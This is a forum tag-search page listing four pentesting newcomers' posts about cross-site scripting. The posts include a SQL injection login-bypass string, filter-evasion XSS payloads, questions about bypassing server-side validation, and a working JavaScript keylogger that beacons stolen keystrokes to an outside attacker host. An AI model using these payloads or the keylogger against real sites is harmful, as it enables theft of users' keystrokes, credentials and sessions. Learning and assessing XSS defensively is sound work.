Search the Community
Showing results for tags 'xss'.
Found 4 results
-
Hello team, I'm new here as I am new to Penetration testing, my next challenge is to perform proper pen-testing on a Win XP SP2 and a CentOS (WebApp) server, I successfully finished with the Win XP in all aspects as for the CentOS I managed to inject SQL (asd' OR 1=1 OR 'a'='a) into the login form and get basic information but that was it, I tried using scripts (<script>alert(1);</script>) but nothing worked, nessus scan showed it's XSS vulnerable. I guess my main point is how further can I dig into the target and how? Cheers
-
I was probing for a reflected xss and I haven't been able to beat the url encoding being performed on the backslash character. the <script>alert(1)<script> is reflected as it is but backslash is encoded into %2F. I tried double encoding the backslash and submitting the new script directly in the url but this dosen't seem to work either. special characters like = ; are also being url encoded. Should I stop probing for xss and look for other point of exploitation or is there a way to cause an xss. **UPDATE: ** after trying inserting <xml%00onreadystatechange%253Dalert(1)> directly in the URL, the reflected string that I get is this but in the URL everything after <xml gets truncated. I guess something worked here and the filters picked it up and truncated everything after <xml.
-
I've recently been looking into XSS attacks and I see how they are useful for gathering cookies from a site but can they be used for anything else? I have a site that is vulnerable to XSS attacks but it doesn't store any cookies. I've used this code to log keystrokes from the site <script> var keys = ''; document.onkeypress = function(e) { var get = window.event ? event : e; var key = get.keyCode ? get.keyCode : get.charCode; key = String.fromCharCode(key); keys += key; } window.setInterval(function(){ new Image().src = 'http://www.myattacksite.com/stealer.php?c=' + keys; keys = ''; }, 1000); </script> which is really cool but it doesn't return any impressive results without a login form on the page. I guess it would be possible to try and redirect the user to a page that performs a browser based attack, possibly something with Metasploit. Have you guys come across any useful XSS attacks that don't involve cookies or keylogging? -
I am performing a security assessment on a website and have discovered a potential XSS vulnerability. I am able to exploit it if I use Burp Suite by supplying my script in place of a parameter in the query string. However, I if I try injecting the code into a URL and clicking on it, the server strips out my JavaScript. I have attempted to use numerous differnet types of encoding with no success. Is there anyway to bypass server side validation? The specific JavaScript unpacker being used is jsunpack. Thanks for any advice in advance.
